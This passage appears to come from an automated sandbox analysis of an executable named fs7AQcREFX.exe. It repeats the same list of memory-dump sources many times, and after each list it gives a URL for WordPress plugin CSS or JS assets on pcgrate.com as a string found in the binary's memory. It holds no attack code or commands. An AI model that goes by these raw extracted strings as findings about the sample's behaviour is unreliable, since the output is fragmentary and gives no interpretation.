00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 